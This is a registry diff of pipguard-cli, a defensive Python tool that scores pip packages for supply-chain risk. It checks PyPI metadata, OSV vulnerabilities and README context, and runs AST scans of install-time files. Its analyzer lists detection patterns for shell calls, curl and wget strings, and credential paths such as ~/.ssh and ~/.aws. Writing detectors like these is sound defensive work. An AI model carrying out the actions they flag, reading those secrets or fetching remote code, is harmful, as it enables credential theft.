pipguard-cli 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,9 @@
1
+ __pycache__/
2
+ *.py[cod]
3
+ *.egg-info/
4
+ dist/
5
+ build/
6
+ .venv/
7
+ venv/
8
+ .env
9
+ *.db
@@ -0,0 +1,8 @@
1
+ Metadata-Version: 2.4
2
+ Name: pipguard-cli
3
+ Version: 0.1.0
4
+ Summary: Supply chain attack prevention for pip installs
5
+ Requires-Python: >=3.10
6
+ Requires-Dist: httpx>=0.27.0
7
+ Requires-Dist: rich>=13.0.0
8
+ Requires-Dist: typer>=0.9.0
@@ -0,0 +1 @@
1
+ __version__ = "0.1.0"
@@ -0,0 +1,116 @@
1
+ import ast
2
+ import io
3
+ import tarfile
4
+ from pathlib import Path
5
+
6
+ import httpx
7
+
8
# Files that execute automatically during install or first import
TARGET_FILES = {"setup.py", "pyproject.toml", "__init__.py"}

_NETWORK_PATTERNS = [
    "requests.", "urllib.", "httpx.", "http.client",
    "ftplib", "smtplib", "socket.",
]
_SHELL_PATTERNS = ["os.system", "subprocess.", "commands.getoutput"]
_HOME_STRINGS = ["~/.ssh", "~/.aws", "~/.config", "~/.gnupg", "~/.netrc"]


class _FlagVisitor(ast.NodeVisitor):
    """AST visitor that records red-flag behaviors in install-time code.

    Flags are write-once booleans: a visit may set a flag to True but never
    resets it, so one visitor instance can accumulate over a whole module.
    """

    def __init__(self):
        self.flags: dict[str, bool] = {
            "network_call": False,
            "env_access": False,
            "home_dir_access": False,
            "shell_exec": False,
            "base64_obfuscation": False,
            "dynamic_exec": False,
        }

    def visit_Call(self, node: ast.Call):
        # Unparse the whole call (callee + args) so the substring checks see
        # both the function name and any literals passed to it.
        func_str = ast.unparse(node)

        if any(p in func_str for p in _NETWORK_PATTERNS):
            self.flags["network_call"] = True

        # curl/wget buried in string args
        for child in ast.walk(node):
            if isinstance(child, ast.Constant) and isinstance(child.value, str):
                if any(s in child.value for s in ("curl ", "wget ", "http://", "https://")):
                    self.flags["network_call"] = True

        if "os.environ" in func_str or "os.getenv" in func_str:
            self.flags["env_access"] = True

        if any(p in func_str for p in _SHELL_PATTERNS):
            self.flags["shell_exec"] = True

        # ast.unparse normalizes spacing, so startswith is reliable here.
        if func_str.startswith("eval(") or func_str.startswith("exec("):
            self.flags["dynamic_exec"] = True
            self.flags["shell_exec"] = True

        if "base64.b64decode" in func_str or "base64.decodebytes" in func_str:
            self.flags["base64_obfuscation"] = True

        # getattr-based obfuscation: getattr(os, 'sys'+'tem')(...)
        if (
            isinstance(node.func, ast.Call)
            and isinstance(node.func.func, ast.Name)
            and node.func.func.id == "getattr"
        ):
            self.flags["dynamic_exec"] = True

        self.generic_visit(node)

    def visit_Attribute(self, node: ast.Attribute):
        full = ast.unparse(node)
        if "expanduser" in full or ".home()" in full:
            self.flags["home_dir_access"] = True
        # Fix: os.environ["KEY"] (a Subscript, not a Call) was previously
        # invisible because only visit_Call checked for environment access.
        # Attribute nodes are visited everywhere, so catch it here too.
        if full.startswith("os.environ") or full == "os.getenv":
            self.flags["env_access"] = True
        self.generic_visit(node)

    def visit_Constant(self, node: ast.Constant):
        # Sensitive-path string literals (e.g. "~/.ssh/id_rsa") count as
        # home-directory access even without an expanduser call.
        if isinstance(node.value, str):
            if any(node.value.startswith(p) for p in _HOME_STRINGS):
                self.flags["home_dir_access"] = True
        self.generic_visit(node)
76
+
77
+
78
def _analyze_source(source: str) -> dict[str, bool]:
    """Run the red-flag visitor over *source*; empty dict if it won't parse."""
    try:
        module = ast.parse(source)
    except SyntaxError:
        return {}
    scanner = _FlagVisitor()
    scanner.visit(module)
    return scanner.flags
86
+
87
+
88
async def analyze_tarball(tarball_url: str) -> dict[str, bool]:
    """Download source tarball and run AST analysis on install-time files."""
    async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
        resp = await client.get(tarball_url)
        resp.raise_for_status()

    # OR-merge of flags across every matching file in the archive.
    merged: dict[str, bool] = dict.fromkeys(
        (
            "network_call",
            "env_access",
            "home_dir_access",
            "shell_exec",
            "base64_obfuscation",
            "dynamic_exec",
        ),
        False,
    )

    with tarfile.open(fileobj=io.BytesIO(resp.content), mode="r:gz") as archive:
        for member in archive.getmembers():
            # Only files that execute at install or first import are scanned.
            if Path(member.name).name not in TARGET_FILES:
                continue
            handle = archive.extractfile(member)
            if handle is None:
                continue
            text = handle.read().decode("utf-8", errors="ignore")
            for flag, hit in _analyze_source(text).items():
                if hit:
                    merged[flag] = True

    return merged
@@ -0,0 +1,51 @@
1
import json
import sqlite3
import time
from contextlib import closing
from pathlib import Path
5
+
6
# On-disk cache location and schema. One SQLite file holds all entries,
# keyed by a namespaced string (e.g. "full:<pkg>:<ver>", "osv:...").
CACHE_DIR = Path.home() / ".pipguard"
CACHE_DB = CACHE_DIR / "cache.db"

TTL_TRUST = 86_400  # 24 hours
TTL_VULN = 21_600  # 6 hours


def _conn() -> sqlite3.Connection:
    """Open the cache database, creating directory and schema on first use.

    Returns an open connection; the caller is responsible for closing it.
    """
    CACHE_DIR.mkdir(exist_ok=True)
    con = sqlite3.connect(CACHE_DB)
    con.execute("""
        CREATE TABLE IF NOT EXISTS cache (
            key TEXT PRIMARY KEY,
            value TEXT NOT NULL,
            expires_at REAL NOT NULL
        )
    """)
    con.commit()
    return con
25
+
26
+
27
def get(key: str) -> dict | None:
    """Return the cached dict for *key*, or None when absent or expired.

    Expired rows are left in place; `set` overwrites them on the next write.
    """
    # closing() fixes a connection leak: sqlite3's `with con` manages only
    # the transaction and never closes the underlying connection.
    with closing(_conn()) as con, con:
        row = con.execute(
            "SELECT value, expires_at FROM cache WHERE key = ?", (key,)
        ).fetchone()
    if row is None:
        return None
    value, expires_at = row
    if time.time() > expires_at:
        return None
    return json.loads(value)
38
+
39
+
40
def set(key: str, value: dict, ttl: int) -> None:
    """Store *value* (JSON-serialized) under *key* for *ttl* seconds."""
    # closing() fixes a connection leak: sqlite3's `with con` commits the
    # transaction but never closes the connection.
    with closing(_conn()) as con, con:
        con.execute(
            "INSERT OR REPLACE INTO cache (key, value, expires_at) VALUES (?, ?, ?)",
            (key, json.dumps(value), time.time() + ttl),
        )
46
+
47
+
48
def clear_vuln() -> None:
    """Wipe all CVE/vulnerability cache entries (for pipguard update --force)."""
    # closing() ensures the connection is released after the delete commits.
    with closing(_conn()) as con, con:
        con.execute("DELETE FROM cache WHERE key LIKE 'osv:%'")
@@ -0,0 +1,90 @@
1
+ from rich.console import Console
2
+ from rich.table import Table
3
+
4
+ console = Console()
5
+
6
+ _VERDICT_COLOR = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
7
+ _VERDICT_LABEL = {"LOW": "LOW RISK", "MEDIUM": "MEDIUM RISK", "HIGH": "HIGH RISK"}
8
+
9
+
10
def show_report(
    package: str,
    metadata: dict,
    download_stats: dict,
    vulns: list[dict],
    analysis_flags: dict,
    breakdown: dict,
    cached: bool = False,
) -> None:
    """Render the full risk report (trust score, code analysis, verdict).

    Args:
        package: Distribution name, shown in the header.
        metadata: PyPI metadata dict (reads age_days, github_url).
        download_stats: Reads spike_pct and last_month.
        vulns: OSV results; first entry's 'id' is shown when non-empty.
        analysis_flags: AST red-flag booleans; empty dict means no sdist.
        breakdown: Scorer output (reads 'verdict' and 'score').
        cached: When True, annotates the header with "(cached)".
    """
    cache_note = " [dim](cached)[/dim]" if cached else ""
    console.print(f"\nAnalyzing [bold]{package}[/bold]{cache_note}...\n")

    # ── Trust score ──────────────────────────────────────────────
    console.rule("[bold]TRUST SCORE[/bold]")
    t = Table(box=None, show_header=False, padding=(0, 2))
    t.add_column(width=28)
    t.add_column()

    # Age icon thresholds (<30d red, <90d warn) mirror the scorer's
    # "package_new" signal — keep the two in sync.
    age = metadata.get("age_days")
    age_str = f"{age}d" if age is not None else "unknown"
    if age is None:
        age_icon = "❓"
    elif age < 30:
        age_icon = "🔴"
    elif age < 90:
        age_icon = "⚠️"
    else:
        age_icon = "✅"
    t.add_row("Package age:", f"{age_str} {age_icon}")

    t.add_row(
        "GitHub repo:",
        "✅ linked" if metadata.get("github_url") else "🔴 none",
    )

    # Spike condition (>300% and <50k monthly downloads) mirrors the
    # scorer's "download_spike" signal.
    spike = download_stats.get("spike_pct")
    last_month = download_stats.get("last_month") or 0
    if spike and spike > 300 and last_month < 50_000:
        t.add_row("Download spike:", f"+{spike:.0f}% ⚠️")
    else:
        t.add_row("Download spike:", "normal ✅")

    if vulns:
        t.add_row("Known vulns:", f"🔴 {len(vulns)} found ({vulns[0]['id']})")
    else:
        t.add_row("Known vulns:", "✅ none")

    console.print(t)

    # ── Code analysis ────────────────────────────────────────────
    console.rule("[bold]CODE ANALYSIS[/bold]")

    # Empty flags dict signals "no sdist to analyze", not "all clear".
    if not analysis_flags:
        console.print(" [dim]No source tarball available — code analysis skipped[/dim]")
    else:
        a = Table(box=None, show_header=False, padding=(0, 2))
        a.add_column(width=28)
        a.add_column()

        def flag_row(label: str, key: str):
            # Missing keys default to False ("not found").
            found = analysis_flags.get(key, False)
            a.add_row(label, "🔴 FOUND" if found else "✅ NOT FOUND")

        # NOTE: dynamic_exec is collected by the analyzer but not shown here.
        flag_row("Network requests:", "network_call")
        flag_row("Env var access:", "env_access")
        flag_row("Shell execution:", "shell_exec")
        flag_row("Base64 obfuscation:", "base64_obfuscation")
        flag_row("Home dir access:", "home_dir_access")
        console.print(a)

    # ── Verdict ──────────────────────────────────────────────────
    verdict = breakdown["verdict"]
    score = breakdown["score"]
    color = _VERDICT_COLOR[verdict]
    console.rule()
    console.print(
        f" VERDICT: [{color}]{_VERDICT_LABEL[verdict]}[/{color}]"
        f" (Score: [bold]{score}[/bold])"
    )
    console.rule()
    console.print()
@@ -0,0 +1,66 @@
1
+ import re
2
+
3
+ import httpx
4
+
5
# Classifiers that indicate a package has no business making network calls at install time
PURE_PYTHON_CLASSIFIERS = {
    "Programming Language :: Python :: Implementation :: CPython",
    "Topic :: Utilities",
    "Topic :: Text Processing",
    "Topic :: Software Development :: Libraries :: Python Modules",
}

# Classifiers where network calls are plausible
NETWORK_CLASSIFIERS = {
    "Topic :: Internet :: WWW/HTTP",
    "Topic :: System :: Networking",
    "Topic :: Scientific/Engineering :: Artificial Intelligence",
    "Topic :: Software Development :: Build Tools",
}

_NETWORK_KEYWORDS = [
    "download", "binary", "binaries", "pre-built", "native extension",
    "model weights", "fetches", "auto-update", "update check",
]
_PURE_KEYWORDS = ["pure python", "pure-python", "zero dependencies", "no network", "offline"]


def classify_from_classifiers(classifiers: list[str]) -> str:
    """
    Returns 'pure_python', 'network_expected', or 'ambiguous' based on PyPI classifiers.
    This is free — classifiers are already in the PyPI JSON response.
    """
    tagged = set(classifiers)
    # Network-plausible classifiers take precedence: a package tagged both
    # ways is still treated as network_expected.
    if tagged & NETWORK_CLASSIFIERS:
        return "network_expected"
    if tagged & PURE_PYTHON_CLASSIFIERS:
        return "pure_python"
    return "ambiguous"
42
+
43
+
44
async def fetch_readme_classification(github_url: str) -> str:
    """
    Only called when classifiers are ambiguous or network_expected.
    Returns 'network_expected', 'pure_python', or 'unknown'.
    """
    match = re.match(r"https://github\.com/([^/]+/[^/\s]+)", github_url)
    if not match:
        return "unknown"

    # Fix: PyPI project_urls frequently end in ".git"; raw.githubusercontent
    # does not understand that suffix, so strip it before building the URL.
    repo = match.group(1).rstrip("/").removesuffix(".git")
    readme_url = f"https://raw.githubusercontent.com/{repo}/HEAD/README.md"

    # follow_redirects: raw URLs can 301 (e.g. after a repo rename).
    async with httpx.AsyncClient(timeout=10, follow_redirects=True) as client:
        r = await client.get(readme_url)
        if r.status_code != 200:
            return "unknown"
        text = r.text.lower()

    # Network keywords win over pure keywords when both appear.
    if any(kw in text for kw in _NETWORK_KEYWORDS):
        return "network_expected"
    if any(kw in text for kw in _PURE_KEYWORDS):
        return "pure_python"
    return "unknown"
@@ -0,0 +1,322 @@
1
+ import asyncio
2
+ import subprocess
3
+ import sys
4
+ from pathlib import Path
5
+ from typing import Optional
6
+
7
+ import typer
8
+ from rich.prompt import Confirm
9
+
10
+ from pipguard import analyzer, cache, display, github, osv, pypi, scorer
11
+ from pipguard.display import console
12
+
13
+ app = typer.Typer(
14
+ help="pipguard — supply chain attack prevention for pip installs.",
15
+ add_completion=False,
16
+ )
17
+
18
+
19
async def _analyze(package: str, version: str | None, no_cache: bool) -> tuple[dict, bool]:
    """Core analysis pipeline. Returns (result_dict, was_cached).

    Args:
        package: PyPI distribution name.
        version: Exact version to analyze, or None for the latest release.
        no_cache: When True, skip the cache read (the fresh result is still
            written back to the cache afterwards).

    Raises:
        Whatever the underlying fetchers raise (e.g. httpx errors);
        command-level callers wrap this in try/except.
    """
    cache_key = f"full:{package}:{version or 'latest'}"

    if not no_cache:
        cached = cache.get(cache_key)
        if cached:
            return cached, True

    # Fetch metadata first to resolve the exact version, then query OSV with it
    metadata = await pypi.fetch_metadata(package, version)
    download_stats, vulns = await asyncio.gather(
        pypi.fetch_download_stats(package),
        osv.check_vulns(package, metadata["version"]),
    )

    # Classifier gating: decide whether to call GitHub README
    classifier_context = github.classify_from_classifiers(metadata["classifiers"])
    readme_context = "unknown"

    # Only spend a (rate-limited) GitHub request when classifiers alone
    # cannot settle the package's intent.
    if classifier_context in ("ambiguous", "network_expected") and metadata.get("github_url"):
        readme_context = await github.fetch_readme_classification(metadata["github_url"])

    # Layer 2: AST analysis — only if source tarball exists
    analysis_flags: dict = {}
    if metadata.get("tarball_url"):
        analysis_flags = await analyzer.analyze_tarball(metadata["tarball_url"])

    breakdown = scorer.compute(
        metadata, download_stats, vulns, analysis_flags, classifier_context, readme_context
    )

    result = {
        "metadata": metadata,
        "download_stats": download_stats,
        "vulns": vulns,
        "analysis_flags": analysis_flags,
        "breakdown": breakdown,
    }

    # NOTE(review): the whole result (including CVE data) is cached with the
    # 24h trust TTL; nothing visible writes 'osv:'-prefixed keys, so TTL_VULN
    # never applies in practice — confirm intended.
    cache.set(cache_key, result, cache.TTL_TRUST)
    return result, False
61
+
62
+
63
@app.command()
def install(
    package: str = typer.Argument(..., help="Package to analyze and install"),
    version: Optional[str] = typer.Option(None, "--version", "-v", help="Specific version"),
    no_cache: bool = typer.Option(False, "--no-cache", help="Bypass cache for this run"),
    yes: bool = typer.Option(False, "--yes", "-y", help="Skip confirmation prompt"),
):
    """Analyze a package for supply chain risks, then install it.

    Exits with code 1 when analysis fails or the user declines to proceed.
    With --yes, installation proceeds regardless of verdict.
    """
    try:
        result, cached = asyncio.run(_analyze(package, version, no_cache))
    except Exception as e:
        console.print(f"[red]Analysis failed: {e}[/red]")
        raise typer.Exit(1)

    display.show_report(
        package,
        result["metadata"],
        result["download_stats"],
        result["vulns"],
        result["analysis_flags"],
        result["breakdown"],
        cached=cached,
    )

    verdict = result["breakdown"]["verdict"]

    # HIGH defaults the prompt to "no", MEDIUM to "yes"; LOW never prompts.
    if verdict == "HIGH" and not yes:
        if not Confirm.ask("Proceed anyway?", default=False):
            raise typer.Exit(1)
    elif verdict == "MEDIUM" and not yes:
        if not Confirm.ask("Proceed anyway?", default=True):
            raise typer.Exit(1)

    # Pin to the analyzed version so what gets installed is what was vetted.
    pkg_spec = f"{package}=={result['metadata']['version']}"
    console.print(f"Installing [bold]{pkg_spec}[/bold]...")
    subprocess.run([sys.executable, "-m", "pip", "install", pkg_spec], check=True)
99
+
100
+
101
@app.command()
def info(
    package: str = typer.Argument(..., help="Package to inspect"),
    version: Optional[str] = typer.Option(None, "--version", "-v"),
    no_cache: bool = typer.Option(False, "--no-cache"),
):
    """Show a risk report without installing."""
    try:
        result, from_cache = asyncio.run(_analyze(package, version, no_cache))
    except Exception as e:
        console.print(f"[red]Analysis failed: {e}[/red]")
        raise typer.Exit(1)

    # Same report as `install`, but analysis-only — no prompt, no pip run.
    report_args = (
        result["metadata"],
        result["download_stats"],
        result["vulns"],
        result["analysis_flags"],
        result["breakdown"],
    )
    display.show_report(package, *report_args, cached=from_cache)
123
+
124
+
125
def _parse_requirements(lines: list[str]) -> list[tuple[str, str | None]]:
    """Turn requirements.txt lines into (name, pinned_version_or_None) pairs.

    Skips blanks, comment lines, and pip option lines (-r, -c, --hash, ...);
    strips environment markers (after ';') and trailing ' #' comments. A
    '==' pin yields (name, version); any other specifier (>=, ~=, extras)
    yields (name, None) so the latest release is analyzed instead.
    """
    packages: list[tuple[str, str | None]] = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("-"):
            continue
        # Drop environment markers and inline comments before parsing.
        line = line.split(";", 1)[0].split(" #", 1)[0].strip()
        if not line:
            continue
        if "==" in line:
            name, ver = line.split("==", 1)
            packages.append((name.strip(), ver.strip()))
        else:
            # Unpinned: cut the name at the first specifier/extras character.
            cut = len(line)
            for ch in "<>~!=[ ":
                pos = line.find(ch)
                if 0 <= pos < cut:
                    cut = pos
            name = line[:cut].strip()
            if name:
                packages.append((name, None))
    return packages


@app.command()
def scan(
    file: str = typer.Option("requirements.txt", "--file", "-f", help="Requirements file"),
    ci: bool = typer.Option(False, "--ci", help="Non-interactive CI mode"),
    fail_on: str = typer.Option("high", "--fail-on", help="Fail threshold: medium or high"),
    no_cache: bool = typer.Option(False, "--no-cache"),
):
    """Scan all packages in a requirements file."""
    req_path = Path(file)
    if not req_path.exists():
        console.print(f"[red]File not found: {file}[/red]")
        raise typer.Exit(1)

    # Fix: previously `pkg>=1.0` was treated as a literal package name and
    # option lines like `-r other.txt` were sent to PyPI as packages.
    packages = _parse_requirements(req_path.read_text().splitlines())

    # Thresholds match the scorer's verdict bands (31 → MEDIUM, 61 → HIGH).
    fail_score = {"medium": 31, "high": 61}.get(fail_on.lower(), 61)
    exit_code = 0

    for name, ver in packages:
        console.print(f"[dim]Scanning {name}...[/dim]")
        try:
            result, cached = asyncio.run(_analyze(name, ver, no_cache))
            bd = result["breakdown"]
            if bd["score"] >= fail_score:
                display.show_report(
                    name,
                    result["metadata"],
                    result["download_stats"],
                    result["vulns"],
                    result["analysis_flags"],
                    bd,
                    cached=cached,
                )
                if ci:
                    exit_code = 1
            else:
                verdict = bd["verdict"]
                color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}[verdict]
                console.print(f" [{color}]{verdict}[/{color}] {name} (score: {bd['score']})")
        except Exception as e:
            # Best-effort: one unscannable package must not abort the run.
            console.print(f"[yellow] Warning: could not scan {name}: {e}[/yellow]")

    if ci and exit_code:
        raise typer.Exit(exit_code)
178
+
179
+
180
@app.command()
def history():
    """Show recent scan results from the local cache."""
    import json
    import sqlite3

    if not cache.CACHE_DB.exists():
        console.print("No scan history yet.")
        return

    con = sqlite3.connect(cache.CACHE_DB)
    rows = con.execute(
        "SELECT key, value FROM cache WHERE key LIKE 'full:%' ORDER BY expires_at DESC LIMIT 20"
    ).fetchall()
    con.close()

    if not rows:
        console.print("No scan history yet.")
        return

    from rich.table import Table

    table = Table(title="Recent Scans", show_lines=False)
    table.add_column("Package")
    table.add_column("Version")
    table.add_column("Score", justify="right")
    table.add_column("Verdict")

    palette = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
    for key, raw in rows:
        breakdown = json.loads(raw).get("breakdown", {})
        # Cache keys look like "full:<package>:<version-or-latest>".
        _, pkg, ver = key.split(":", 2)
        verdict = breakdown.get("verdict", "?")
        score = breakdown.get("score", "?")
        color = palette.get(verdict, "white")
        table.add_row(pkg, ver, str(score), f"[{color}]{verdict}[/{color}]")

    console.print(table)
218
+
219
+
220
@app.command()
def update(
    force: bool = typer.Option(False, "--force", help="Wipe and refresh all CVE cache entries"),
):
    """Manage the pipguard cache."""
    # Without --force this command is informational only.
    if not force:
        console.print("Use [bold]pipguard update --force[/bold] to refresh CVE cache immediately.")
        return
    cache.clear_vuln()
    console.print(
        "[green]CVE cache cleared.[/green] Fresh vulnerability data will be fetched on next scan."
    )
232
+
233
+
234
@app.command()
def configure():
    """Set up automatic pip interception for your shell.

    Appends a `pip` shell function to the user's shell config (or PowerShell
    profile) that routes `pip install ...` through `pipguard install` and
    falls back to the real pip for every other subcommand. Idempotent: a
    marker comment prevents appending twice.
    """
    import os
    import platform

    # Shell snippets. Each begins with the MARKER comment line (see below),
    # which is how already_configured() detects a previous install.
    BASH_ZSH_FUNC = """
# pipguard — intercept pip install
pip() {
    if [ "$1" = "install" ]; then
        pipguard install "${@:2}"
    else
        command pip "$@"
    fi
}
"""

    FISH_FUNC = """
# pipguard — intercept pip install
function pip
    if test "$argv[1]" = "install"
        pipguard install $argv[2..]
    else
        command pip $argv
    end
end
"""

    POWERSHELL_FUNC = """
# pipguard — intercept pip install
function pip {
    if ($args[0] -eq "install") {
        pipguard install @($args | Select-Object -Skip 1)
    } else {
        & (Get-Command pip -CommandType Application | Select-Object -First 1).Source @args
    }
}
"""

    MARKER = "# pipguard — intercept pip install"

    def already_configured(path: Path) -> bool:
        # True when the config file exists and already carries our marker.
        return path.exists() and MARKER in path.read_text()

    def append_to(path: Path, content: str):
        # Create parent dirs as needed; append-only, never overwrite.
        path.parent.mkdir(parents=True, exist_ok=True)
        with open(path, "a") as f:
            f.write(content)

    # Detect shell and config file
    if platform.system() == "Windows":
        # PowerShell
        # NOTE(review): this hard-codes the Windows PowerShell 5.x profile
        # location; PowerShell 7+ (pwsh) reads Documents/PowerShell instead —
        # confirm which shells must be supported.
        ps_profile = Path(os.environ.get("USERPROFILE", str(Path.home()))) / "Documents" / "WindowsPowerShell" / "Microsoft.PowerShell_profile.ps1"
        if already_configured(ps_profile):
            console.print("[yellow]pipguard is already configured in your PowerShell profile.[/yellow]")
            return
        append_to(ps_profile, POWERSHELL_FUNC)
        console.print(f"[green]Done![/green] Added pip interceptor to:\n {ps_profile}")
        console.print("\nReload your shell or run:")
        console.print(" [bold]. $PROFILE[/bold]")

    else:
        shell = os.environ.get("SHELL", "")
        if "zsh" in shell:
            config = Path.home() / ".zshrc"
            func = BASH_ZSH_FUNC
        elif "fish" in shell:
            config = Path.home() / ".config" / "fish" / "config.fish"
            func = FISH_FUNC
        else:
            # Default to bash when $SHELL is unset or unrecognized.
            config = Path.home() / ".bashrc"
            func = BASH_ZSH_FUNC

        if already_configured(config):
            console.print(f"[yellow]pipguard is already configured in {config}[/yellow]")
            return

        append_to(config, func)
        console.print(f"[green]Done![/green] Added pip interceptor to:\n {config}")
        console.print("\nReload your shell or run:")
        console.print(f" [bold]source {config}[/bold]")

    console.print("\nFrom now on, [bold]pip install <package>[/bold] will automatically run through pipguard.")
    console.print("To remove, delete the pip() function from the config file shown above.")
319
+
320
+
321
+ if __name__ == "__main__":
322
+ app()
@@ -0,0 +1,19 @@
1
+ import httpx
2
+
3
OSV_URL = "https://api.osv.dev/v1/query"


async def check_vulns(package: str, version: str) -> list[dict]:
    """Query OSV.dev for known vulnerabilities in *package* at *version*."""
    query = {
        "version": version,
        "package": {"name": package, "ecosystem": "PyPI"},
    }
    async with httpx.AsyncClient(timeout=10) as client:
        response = await client.post(OSV_URL, json=query)
        response.raise_for_status()
        body = response.json()

    # Normalize to lightweight {id, summary} dicts for display/scoring.
    results: list[dict] = []
    for vuln in body.get("vulns", []):
        results.append({"id": vuln["id"], "summary": vuln.get("summary", "No description")})
    return results
@@ -0,0 +1,84 @@
1
+ from datetime import datetime, timezone
2
+
3
+ import httpx
4
+
5
+ PYPI_URL = "https://pypi.org/pypi/{package}/json"
6
+ PYPI_VERSION_URL = "https://pypi.org/pypi/{package}/{version}/json"
7
+ PYPISTATS_URL = "https://pypistats.org/api/packages/{package}/recent"
8
+
9
+
10
+ async def fetch_metadata(package: str, version: str | None = None) -> dict:
11
+ url = (
12
+ PYPI_VERSION_URL.format(package=package, version=version)
13
+ if version
14
+ else PYPI_URL.format(package=package)
15
+ )
16
+ async with httpx.AsyncClient(timeout=10) as client:
17
+ r = await client.get(url)
18
+ r.raise_for_status()
19
+ data = r.json()
20
+
21
+ info = data["info"]
22
+ releases = data.get("releases", {})
23
+
24
+ # Earliest release date across all versions
25
+ all_dates = []
26
+ for files in releases.values():
27
+ for f in files:
28
+ if f.get("upload_time"):
29
+ all_dates.append(
30
+ datetime.fromisoformat(f["upload_time"]).replace(tzinfo=timezone.utc)
31
+ )
32
+ first_release = min(all_dates) if all_dates else None
33
+ age_days = (datetime.now(timezone.utc) - first_release).days if first_release else None
34
+
35
+ # GitHub repo from project_urls or home_page
36
+ project_urls = info.get("project_urls") or {}
37
+ candidates = list(project_urls.values()) + [info.get("home_page") or ""]
38
+ github_url = next((u for u in candidates if u and "github.com" in u), None)
39
+
40
+ # Source tarball URL — version-specific endpoint puts files under data["urls"],
41
+ # the non-version endpoint puts them under releases[version]
42
+ target_version = version or info["version"]
43
+ tarball_url = None
44
+ candidate_files = data.get("urls") or releases.get(target_version, [])
45
+ for f in candidate_files:
46
+ if f.get("packagetype") == "sdist":
47
+ tarball_url = f["url"]
48
+ break
49
+
50
+ return {
51
+ "name": info["name"],
52
+ "version": target_version,
53
+ "age_days": age_days,
54
+ "classifiers": info.get("classifiers") or [],
55
+ "github_url": github_url,
56
+ "maintainer": info.get("maintainer") or info.get("author"),
57
+ "tarball_url": tarball_url,
58
+ "release_count": len(releases),
59
+ }
60
+
61
+
62
async def fetch_download_stats(package: str) -> dict:
    """Fetch recent download counts from pypistats.org.

    Returns last_week / last_month totals plus spike_pct — the percentage by
    which this week's downloads exceed the weekly average implied by the
    monthly total. All values are None when the stats endpoint is unavailable.
    """
    async with httpx.AsyncClient(timeout=10) as client:
        resp = await client.get(PYPISTATS_URL.format(package=package))
    if resp.status_code != 200:
        return {"last_week": None, "last_month": None, "spike_pct": None}
    stats = resp.json()["data"]

    weekly = stats.get("last_week") or 0
    monthly = stats.get("last_month") or 0

    # Expected weekly = monthly / 4; spike = how much this week exceeds that
    baseline = monthly / 4 if monthly else 0
    spike = None
    if baseline > 0:
        spike = (weekly - baseline) / baseline * 100

    return {
        "last_week": weekly,
        "last_month": monthly,
        "spike_pct": spike,
    }
@@ -0,0 +1,84 @@
1
_WEIGHTS = {
    "known_cve": 50,
    "shell_exec": 40,
    "base64_obfuscation": 35,
    "package_new": 30,
    "home_dir_access": 30,
    "network_call_full": 25,  # pure Python package making network calls
    "network_call_discounted": 8,  # network calls expected for this package type
    "env_access": 20,
    "maintainer_new": 20,
    "download_spike": 15,
    "no_github": 10,
}


def compute(
    metadata: dict,
    download_stats: dict,
    vulns: list[dict],
    analysis_flags: dict,
    classifier_context: str,  # 'pure_python' | 'network_expected' | 'ambiguous'
    readme_context: str,  # 'network_expected' | 'pure_python' | 'unknown'
) -> dict:
    """Aggregate trust and code-analysis signals into a risk score.

    Returns {"score": int, "verdict": "LOW"|"MEDIUM"|"HIGH",
    "signals": {label: points}} where score is the sum of all signal points.
    """
    signals: dict[str, int] = {}

    if vulns:
        signals[f"Known CVE ({vulns[0]['id']})"] = _WEIGHTS["known_cve"]

    age_days = metadata.get("age_days")
    if age_days is not None and age_days < 30:
        signals[f"Package < 30 days old ({age_days}d)"] = _WEIGHTS["package_new"]

    # Spikes only count for small packages (< 50k monthly downloads).
    spike_pct = download_stats.get("spike_pct")
    last_month = download_stats.get("last_month") or 0
    if spike_pct and spike_pct > 300 and last_month < 50_000:
        signals[f"Download spike +{spike_pct:.0f}%"] = _WEIGHTS["download_spike"]

    if not metadata.get("github_url"):
        signals["No GitHub repo linked"] = _WEIGHTS["no_github"]

    # Simple one-flag-one-weight signals from the AST analysis.
    flag_table = (
        ("shell_exec", "Shell execution in setup.py", "shell_exec"),
        ("base64_obfuscation", "Base64 obfuscation", "base64_obfuscation"),
        ("home_dir_access", "Home directory access", "home_dir_access"),
        ("env_access", "Env variable access", "env_access"),
    )
    for flag, label, weight_key in flag_table:
        if analysis_flags.get(flag):
            signals[label] = _WEIGHTS[weight_key]

    # Network calls are context-weighted: pure-Python packages get the full
    # penalty; packages whose classifiers/README say "network expected" get
    # the discounted one.
    if analysis_flags.get("network_call"):
        if classifier_context == "pure_python":
            signals["Network call in setup.py (unexpected for pure Python)"] = (
                _WEIGHTS["network_call_full"]
            )
        elif classifier_context == "network_expected" or readme_context == "network_expected":
            signals["Network call in setup.py (expected for this package type)"] = (
                _WEIGHTS["network_call_discounted"]
            )
        else:
            signals["Network call in setup.py"] = _WEIGHTS["network_call_full"]

    score = sum(signals.values())
    if score <= 30:
        verdict = "LOW"
    elif score <= 60:
        verdict = "MEDIUM"
    else:
        verdict = "HIGH"

    return {"score": score, "verdict": verdict, "signals": signals}
@@ -0,0 +1,165 @@
1
+ # pipguard — Plan & Scope
2
+
3
+ > "Know what you're installing before you install it."
4
+
5
+ A CLI tool that intercepts `pip install` and analyzes packages for supply chain attacks before they touch your system. The data to detect malicious packages already exists — PyPI, OSV.dev, GitHub. The gap is workflow integration. Nobody has made checking automatic at the exact moment of install.
6
+
7
+ ---
8
+
9
+ ## The Problem
10
+
11
+ Supply chain attacks are increasing, especially in AI/ML where developers install unfamiliar packages constantly. Attack vectors: typosquatting (`reqeusts`, `nunpy`), dependency confusion, account takeover, slow poisoning (xz utils 2024), maintainer going rogue (colors.js). Common payload: steal API keys/SSH keys, open backdoors — all through `setup.py` which executes automatically on install.
12
+
13
+ ---
14
+
15
+ ## Architecture
16
+
17
+ ### Layer 1 — Trust Score (API calls, no download)
18
+
19
+ | Signal | Source |
20
+ |--------|--------|
21
+ | Package age, version history | PyPI JSON API |
22
+ | Download spike > 300% week-over-week AND total downloads < 50k | pypistats.org |
23
+ | No linked GitHub repo | PyPI JSON API |
24
+ | Maintainer account age, # of other packages | PyPI JSON API |
25
+ | Maintainer changed between versions | PyPI JSON API |
26
